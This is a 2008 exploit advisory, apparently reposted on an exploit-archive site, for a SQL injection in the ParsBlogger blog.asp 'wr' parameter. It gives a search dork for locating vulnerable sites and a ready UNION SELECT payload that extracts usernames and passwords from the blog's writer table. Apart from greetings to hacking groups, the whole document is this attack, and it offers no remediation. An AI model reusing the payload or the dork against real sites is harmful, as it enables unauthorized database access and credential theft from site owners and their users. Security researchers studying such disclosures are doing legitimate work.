[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : ParsBlogger (blog.asp wr) Remote SQL Injection Vulnerability
# Published : 2008-11-26
# Author : BorN To K!LL
# Previous Title : Post Affiliate Pro v.3 (umprof_status) Blind SQL Injection Vulnerability
# Next Title : Star Articles 6.0 Remote Blind SQL Injection Vulnerability
--------------------------------------------------------------------------------------------------------------------
[~] Script : ParsBlogger
[~] Version : >!<
[~] Link : http://www.parsblogger.com
[~] Dork : "Powered by ParsBlogger"
[~] Author : BorN To K!LL
[~] TeaM : Security Geeks [ Sec-Geeks.com ]
--------------------------------------------------------------------------------------------------------------------
[~] Exploit :.
site.ir/blog.asp?wr=[SQL]
[~] Example :.
site.ir/blog.asp?wr=-5+union+all+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13+from+writer--
--------------------------------------------------------------------------------------------------------------------
[~] Greetings :.
[ ??r ?|??CD??£?“ ] , [ SECURITY G?£?£KS ] , [ AsbMay's Group ] , [ w4ck1ng TeaM ] , [ darkc0de TeaM ] , [ Juba ] .. n all muslims
--------------------------------------------------------------------------------------------------------------------
# www.Syue.com [2008-11-26]